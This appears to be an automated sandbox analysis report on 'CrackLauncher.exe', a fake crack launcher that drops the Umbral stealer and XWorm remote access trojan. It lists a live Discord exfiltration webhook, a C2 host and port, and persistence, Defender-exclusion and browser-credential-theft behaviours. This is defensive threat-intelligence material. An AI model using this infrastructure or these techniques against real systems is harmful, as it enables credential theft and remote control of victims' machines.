umbral | 87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
29-06-2024 20:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CrackLauncher.exe
Size

3.0MB
MD5

6850a8c541b310a2f4a5cd88352856a3
SHA1

372ff19e90cec46e37797b343fe6f537116b4aae
SHA256

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95
SHA512

924d20cd368e797a771cf8b27b5e8994c62139a85a92ca068b64b0ac65598475b2225a81d08abb2aab9ad87f08d261f950219c16cee1b6d2e21c4b0c95eee4fa
SSDEEP

49152:g97jAtnr1ky+cFvVnJxuw9APD764uBxsPqlRJiM4C/d7Nch8zmOqYmlMH9TLi:g9otJOc/Jxuw9g764ssPqlbiM46ch8z6

Score

10^/10

umbral xworm evasion execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1252172365647974441/4gQlLrJt2VtCn71LmsFuTifq4qn3SRnlOC0k8H5iaa8g2BlP4YuRr9feLLYTpIHpdtxd

Extracted

Family

xworm

Version

5.0

127.0.0.1:28223

unknown-sunglasses.gl.at.ply.gg:28223

Mutex

rVUJpGK3xHCE778M

Attributes

Install_directory
%AppData%
install_file
svchost.exe

aes.plain

Signatures

Detect Umbral payload 8 IoCs

resource	yara_rule
behavioral1/files/0x003b000000013362-27.dat	family_umbral
behavioral1/memory/2784-29-0x0000000000BD0000-0x0000000000C10000-memory.dmp	family_umbral
behavioral1/memory/836-183-0x0000000000350000-0x0000000000390000-memory.dmp	family_umbral
behavioral1/memory/2040-303-0x0000000001020000-0x0000000001060000-memory.dmp	family_umbral
behavioral1/memory/780-433-0x00000000010A0000-0x00000000010E0000-memory.dmp	family_umbral
behavioral1/memory/1764-629-0x0000000000B90000-0x0000000000BD0000-memory.dmp	family_umbral
behavioral1/memory/1092-731-0x0000000000CC0000-0x0000000000D00000-memory.dmp	family_umbral
behavioral1/memory/756-1399-0x00000000002C0000-0x0000000000300000-memory.dmp	family_umbral

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/memory/2780-53-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/2780-54-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/2780-56-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/2780-50-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/2780-48-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2172	powershell.exe
2380	powershell.exe
580	powershell.exe
1932	powershell.exe
1468	powershell.exe
2840	powershell.exe
2620	powershell.exe
2012	powershell.exe
2496	powershell.exe
1596	powershell.exe
292	powershell.exe
2204	powershell.exe
2756	powershell.exe
792	powershell.exe
3004	powershell.exe
1868	powershell.exe
2620	powershell.exe
2928	powershell.exe
2736	powershell.exe
1192	powershell.exe
568	powershell.exe
2836	powershell.exe
1984	powershell.exe
1748	powershell.exe
2960	powershell.exe
2488	powershell.exe
2888	powershell.exe
2092	powershell.exe
2700	powershell.exe
2320	powershell.exe
1576	powershell.exe
2208	powershell.exe
2080	powershell.exe
1800	powershell.exe
1876	powershell.exe
1532	powershell.exe
1780	powershell.exe
1636	powershell.exe
2848	powershell.exe
2264	powershell.exe
3004	powershell.exe
2880	powershell.exe
2644	powershell.exe
1800	powershell.exe
948	powershell.exe
2004	powershell.exe
2572	powershell.exe
2712	powershell.exe
2888	powershell.exe
1536	powershell.exe
1928	powershell.exe
2060	powershell.exe
2804	powershell.exe
2764	powershell.exe
2152	powershell.exe
1700	powershell.exe
1544	powershell.exe
1700	powershell.exe
2980	powershell.exe
2304	powershell.exe
948	powershell.exe
2864	powershell.exe
1888	powershell.exe
1320	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 38 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x003b00000001340e-39.dat	net_reactor
behavioral1/memory/2528-41-0x0000000000F00000-0x00000000010E8000-memory.dmp	net_reactor
behavioral1/memory/2128-100-0x0000000000080000-0x0000000000268000-memory.dmp	net_reactor
behavioral1/memory/896-201-0x00000000001C0000-0x00000000003A8000-memory.dmp	net_reactor
behavioral1/memory/2548-252-0x0000000000C50000-0x0000000000E38000-memory.dmp	net_reactor
behavioral1/memory/2936-312-0x00000000009C0000-0x0000000000BA8000-memory.dmp	net_reactor
behavioral1/memory/1852-395-0x00000000013E0000-0x00000000015C8000-memory.dmp	net_reactor
behavioral1/memory/1368-442-0x0000000000CA0000-0x0000000000E88000-memory.dmp	net_reactor
behavioral1/memory/1780-480-0x0000000001010000-0x00000000011F8000-memory.dmp	net_reactor
behavioral1/memory/2348-536-0x0000000000140000-0x0000000000328000-memory.dmp	net_reactor
behavioral1/memory/1984-582-0x0000000000970000-0x0000000000B58000-memory.dmp	net_reactor
behavioral1/memory/1072-639-0x0000000000F60000-0x0000000001148000-memory.dmp	net_reactor
behavioral1/memory/1620-688-0x0000000001070000-0x0000000001258000-memory.dmp	net_reactor
behavioral1/memory/3020-740-0x0000000000320000-0x0000000000508000-memory.dmp	net_reactor
behavioral1/memory/2804-770-0x0000000000280000-0x0000000000468000-memory.dmp	net_reactor
behavioral1/memory/664-801-0x0000000000C40000-0x0000000000E28000-memory.dmp	net_reactor
behavioral1/memory/3052-831-0x00000000002E0000-0x00000000004C8000-memory.dmp	net_reactor
behavioral1/memory/2620-861-0x0000000001030000-0x0000000001218000-memory.dmp	net_reactor
behavioral1/memory/1784-903-0x0000000000F70000-0x0000000001158000-memory.dmp	net_reactor
behavioral1/memory/2212-933-0x0000000000C90000-0x0000000000E78000-memory.dmp	net_reactor
behavioral1/memory/2736-963-0x0000000001350000-0x0000000001538000-memory.dmp	net_reactor
behavioral1/memory/1628-993-0x0000000000D70000-0x0000000000F58000-memory.dmp	net_reactor
behavioral1/memory/1544-1063-0x00000000011F0000-0x00000000013D8000-memory.dmp	net_reactor
behavioral1/memory/1568-1098-0x00000000001D0000-0x00000000003B8000-memory.dmp	net_reactor
behavioral1/memory/1372-1128-0x0000000000300000-0x00000000004E8000-memory.dmp	net_reactor
behavioral1/memory/2796-1158-0x0000000000A10000-0x0000000000BF8000-memory.dmp	net_reactor
behavioral1/memory/1468-1208-0x0000000000D30000-0x0000000000F18000-memory.dmp	net_reactor
behavioral1/memory/2108-1238-0x00000000008E0000-0x0000000000AC8000-memory.dmp	net_reactor
behavioral1/memory/2408-1279-0x00000000011A0000-0x0000000001388000-memory.dmp	net_reactor
behavioral1/memory/320-1309-0x0000000000EC0000-0x00000000010A8000-memory.dmp	net_reactor
behavioral1/memory/1220-1374-0x0000000000830000-0x0000000000A18000-memory.dmp	net_reactor
behavioral1/memory/564-1408-0x0000000001310000-0x00000000014F8000-memory.dmp	net_reactor
behavioral1/memory/2848-1438-0x0000000000E60000-0x0000000001048000-memory.dmp	net_reactor
behavioral1/memory/1776-1508-0x0000000000B90000-0x0000000000D78000-memory.dmp	net_reactor
behavioral1/memory/2256-1538-0x0000000000990000-0x0000000000B78000-memory.dmp	net_reactor
behavioral1/memory/2584-1597-0x0000000000F90000-0x0000000001178000-memory.dmp	net_reactor
behavioral1/memory/2548-1628-0x0000000001320000-0x0000000001508000-memory.dmp	net_reactor
behavioral1/memory/2400-1669-0x0000000000150000-0x0000000000338000-memory.dmp	net_reactor

Drops startup file 42 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	MSBuild.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	MSBuild.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe

Executes dropped EXE 64 IoCs

pid	Process
2680	Nursultan Setup.exe
2784	Запустить Nursultan.exe
2528	Nursultan.exe
1484	Nursultan Setup.exe
532	Запустить Nursultan.exe
2128	Nursultan.exe
2576	Nursultan Setup.exe
836	Запустить Nursultan.exe
896	Nursultan.exe
3004	Nursultan Setup.exe
2492	Запустить Nursultan.exe
2548	Nursultan.exe
2268	Nursultan Setup.exe
2040	Запустить Nursultan.exe
2936	Nursultan.exe
480	Process not Found
2060	jqvljmboayxs.exe
2304	Nursultan Setup.exe
620	Запустить Nursultan.exe
1852	Nursultan.exe
2980	Nursultan Setup.exe
780	Запустить Nursultan.exe
1368	Nursultan.exe
1648	Nursultan Setup.exe
2452	Запустить Nursultan.exe
1780	Nursultan.exe
2768	Nursultan Setup.exe
1476	Запустить Nursultan.exe
2348	Nursultan.exe
2512	Nursultan Setup.exe
1576	Запустить Nursultan.exe
1984	Nursultan.exe
2736	Nursultan Setup.exe
2276	jqvljmboayxs.exe
1764	Запустить Nursultan.exe
1072	Nursultan.exe
2272	Nursultan Setup.exe
1468	Запустить Nursultan.exe
1620	Nursultan.exe
1772	Nursultan Setup.exe
1092	Запустить Nursultan.exe
3020	Nursultan.exe
2572	Nursultan Setup.exe
940	Запустить Nursultan.exe
2804	Nursultan.exe
2756	svchost.exe
772	Nursultan Setup.exe
1748	Запустить Nursultan.exe
664	Nursultan.exe
1868	Nursultan Setup.exe
1996	Запустить Nursultan.exe
3052	Nursultan.exe
1588	Nursultan Setup.exe
1352	Запустить Nursultan.exe
2620	Nursultan.exe
2800	jqvljmboayxs.exe
1352	Nursultan Setup.exe
2440	Запустить Nursultan.exe
1784	Nursultan.exe
940	Nursultan Setup.exe
1608	Запустить Nursultan.exe
2212	Nursultan.exe
1800	Nursultan Setup.exe
1036	Запустить Nursultan.exe

Loads dropped DLL 64 IoCs

pid	Process
2248	CrackLauncher.exe
2248	CrackLauncher.exe
1616	CrackLauncher.exe
1616	CrackLauncher.exe
3044	CrackLauncher.exe
3044	CrackLauncher.exe
2780	MSBuild.exe
1536	CrackLauncher.exe
1536	CrackLauncher.exe
2404	CrackLauncher.exe
2404	CrackLauncher.exe
480	Process not Found
3000	CrackLauncher.exe
3000	CrackLauncher.exe
2116	CrackLauncher.exe
2116	CrackLauncher.exe
2460	CrackLauncher.exe
2460	CrackLauncher.exe
2056	CrackLauncher.exe
2056	CrackLauncher.exe
2912	CrackLauncher.exe
2912	CrackLauncher.exe
2900	CrackLauncher.exe
2900	CrackLauncher.exe
480	Process not Found
480	Process not Found
2480	CrackLauncher.exe
2480	CrackLauncher.exe
1668	CrackLauncher.exe
1668	CrackLauncher.exe
2196	CrackLauncher.exe
2196	CrackLauncher.exe
1660	CrackLauncher.exe
1660	CrackLauncher.exe
2632	CrackLauncher.exe
2632	CrackLauncher.exe
2216	CrackLauncher.exe
2216	CrackLauncher.exe
480	Process not Found
480	Process not Found
2372	CrackLauncher.exe
2372	CrackLauncher.exe
860	CrackLauncher.exe
860	CrackLauncher.exe
2456	CrackLauncher.exe
2456	CrackLauncher.exe
2032	CrackLauncher.exe
2032	CrackLauncher.exe
2012	CrackLauncher.exe
2012	CrackLauncher.exe
480	Process not Found
480	Process not Found
1992	CrackLauncher.exe
1992	CrackLauncher.exe
1492	CrackLauncher.exe
1492	CrackLauncher.exe
2768	CrackLauncher.exe
2768	CrackLauncher.exe
1748	CrackLauncher.exe
1748	CrackLauncher.exe
2220	CrackLauncher.exe
2220	CrackLauncher.exe
2864	CrackLauncher.exe
2864	CrackLauncher.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	MSBuild.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
